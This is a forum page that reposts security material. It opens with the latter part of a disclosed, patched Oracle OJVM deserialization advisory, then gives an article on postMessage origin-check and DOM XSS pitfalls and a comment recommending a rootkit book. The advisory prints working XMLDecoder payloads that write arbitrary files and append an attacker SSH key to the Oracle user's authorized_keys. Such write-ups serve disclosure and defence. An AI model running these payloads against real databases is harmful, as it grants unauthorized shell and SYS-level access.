class="java.beans.XMLDecoder" version="1.4.0" > <object class="java.io.FileWriter"> <string>/tmp/PleaseDoNotWork.txt </string> <boolean>True</boolean> <void method="write"> <string>Why for the love of god?</string> </void> <void method="close" /> </object> </java>'); END; / Executing this anonymous block creates a file named "PleaseDoNotWork.txt" in the /tmp folder: Therefore via deserialiazation, we can write arbitrary files to the file system, bypassing the built-in security restrictions. Exploitation As it turns out, we can not only write new files to the system, we can also overwrite or append any file on which the Oracle user has write permissions. Clearly this has severe ramifications for the database, as an attacker could overwrite critical files - including control files - which could result in a successful Denial of Service attack or data corruption. However, with a carefully crafted payload, we can use this deserialization attack to gain access to the server as the Oracle user. Assuming SSH is open on the server and configured to accept RSA connections, the following payload will append an RSA token to the Oracle account that manages the database processes. BEGIN AUTHKEY ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 BEGIN decodeme(' <java class="java.beans.XMLDecoder" version="1.4.0"> <object class="java.io.FileWriter"> <string>/home/oracle/.ssh/authorized_keys</string> <boolean>True</boolean> <void method="write"> <string>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ1UeJEW6ZVkiuWAxBKW8F4fc0VrWxR5HEgaAcVodhgc6X7klyOWrJceGqICcCZd6K+/lvI3xaE2scJpRZWlcJQNCoZMRfmlhibq9IWMH0dm5LqL3QMqrXzZ+a2dfNohSdSmLDTaFHkzOGKEQIwHCv/e4e/eKnm0fUWHeL0k4KuCn3MQUN1HwoqoCciR0DrBDOYAKHxqpBv9rDneCdvaS+tqlr5eShjNlHv1YzJGb0lZZlsny19is8CkhcZ6+O+UCKoBPrxaGsfipsEIH5aPu9xVA90Xgsakhg4yoy9FLnES+xmnVxKX5GHyixi3qeWGDwBsAvhAAGLxOc5 </string> </void> <void method="close" /> </object> </java> '); END; / When executed, the code will append an arbitrary RSA key to the Oracle users authorized_keys file, granting an attack SSH access as the Oracle user. The Oracle user can access the database as SYS and the attacker has effectively compromised the entire database. Impact As Oracle Database has a high per instance cost, many production architectures rely on a shared-tennant model, where multiple mission applications leverage the same database, and application support users share access to the same system. Furthermore, Oracle Exadata implementations often host multiple database instances on the same severs. If a low privileged user, perhaps a tier-III support admin for a specific application, were to deploy this exploit, they could effectively gain access to the data and applications supporting an entire enterprise. Conclusion As we can see the deserialization design pattern implemented in java continues to create a myriad of vulnerabilities. Security analysts should look beyond J2EE based deserializiation attacks and consider attack vectors based on other embedded implementations. Reporting Timeline. This issue was first reported to Oracle Support in January 2018, and was addressed in the July 2018 CPU released on July 17th, 2018. Update: Navigating the intricacies of Oracle patches can be quite the challenge. The Oracle bug for this vulnerability is Bug 27923353, and the patch is for the OJVM system. For this POC, the proper patch is OJVM release update 12.2.0.1.180717 (p27923353_122010_Linux-x86-64.zip) Sursa: http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html1 point
-
The pitfalls of postMessage December 8, 2016 The postMessage API is an alternative to JSONP, XHR with CORS headers and other methods enabling sending data between origins. It was introduced with HTML5 and like many other cross-document features it can be a source of client-side vulnerabilities. How it works To send a message, an application simply calls the "postMessage" function on the target window it would like to send the message to: targetWindow.postMessage("hello other document!", "*"); And to receive a message, a “message” event handler can be registered on the receiving end: window.addEventListener("message", function(message){console.log(message.data)}); Pitfall 1 The first pitfall lies in the second argument of the “postMessage” function. This argument specifies which origin is allowed to receive the message. Using the wildcard “*” means that any origin is allowed to receive the message. Since the target window is located at a different origin, there is no way for the sender window to know if the target window is at the target origin when sending the message. If the target window has been navigated to another origin, the other origin would receive the data. Pitfall 2 The second pitfall lies on the receiving end. Since the listener listens for any message, an attacker could trick the application by sending a message from the attacker’s origin, which would make the receiver think it received the message from the sender’s window. To avoid this, the receiver must validate the origin of the message with the “message.origin” attribute. If regex is used to validate the origin, it’s important to escape the “.” character, since this code: //Listener on http://www.examplereceiver.com/ window.addEventListener("message", function(message){ if(/^http://www.examplesender.com$/.test(message.origin)){ console.log(message.data); } }); Would not only allow messages from “www.examplesender.com“, but also “wwwaexamplesender.com“, “wwwbexamplesender.com” etc. Pitfall 3 The third pitfall is DOM XSS by using the message in a way that the application treats it as HTML/script, for example: //Listener on http://www.examplereceiver.com/ window.addEventListener("message", function(message){ if(/^http://www\.examplesender\.com$/.test(message.origin)){ document.getElementById("message").innerHTML = message.data; } }); DOM XSS isn’t postMessage specific, but it’s something that’s present in many postMessage implementations. One reason for this could be that the receiving application expects the data to be formatted correctly, since it’s only listening for messages from http://www.examplesender.com/. But what if an attacker finds an XSS bug on http://www.examplesender.com/? That would mean that they could XSS http://www.examplereceiver.com/ as well. Not using postMessage? You might be thinking “our application doesn’t use postMessage so these issues doesn’t apply to us”. Well, a lot of third party scripts use postMessage to communicate with the third party service, so your application might be using postMessage without your knowledge. You can check if a page has a registered message listener (and which script registered it) by using Chrome Devtools, under Sources -> Global Listeners: Some third party scripts fall into these pitfalls. In the next post I will describe a postMessage vulnerability that caused XSS on over a million websites, and the technique I used to find it. References https://seclab.stanford.edu/websec/frames/post-message.pdf https://www.w3.org/TR/webmessaging/ http://caniuse.com/#feat=x-doc-messaging Author: Mathias Karlsson Security Researcher @avlidienbrunn Sursa: https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/1 point
-
Geniala cartea. Merita dezgropat threadul. Se pisa pe obiectul "sisteme de operare" din facultate. Bill Blunden The Rootkit Arsenal: Escape and Evasion: Escape and Evasion in the Dark Corners of the System http://index-of.es/Magazines/hakin9/ Cartea este prin resursele din linkul de mai sus. Descriere amazon: With the growing prevalence of the Internet, rootkit technology has taken center stage in the battle between White Hats and Black Hats. Adopting an approach that favors full disclosure, The Rootkit Arsenal presents the most accessible, timely, and complete coverage of rootkit technology. This book covers more topics, in greater depth, than any other currently available. In doing so, the author forges through the murky back alleys of the Internet, shedding light on material that has traditionally been poorly documented, partially documented, or intentionally undocumented.1 point
-
1 point
-
1 point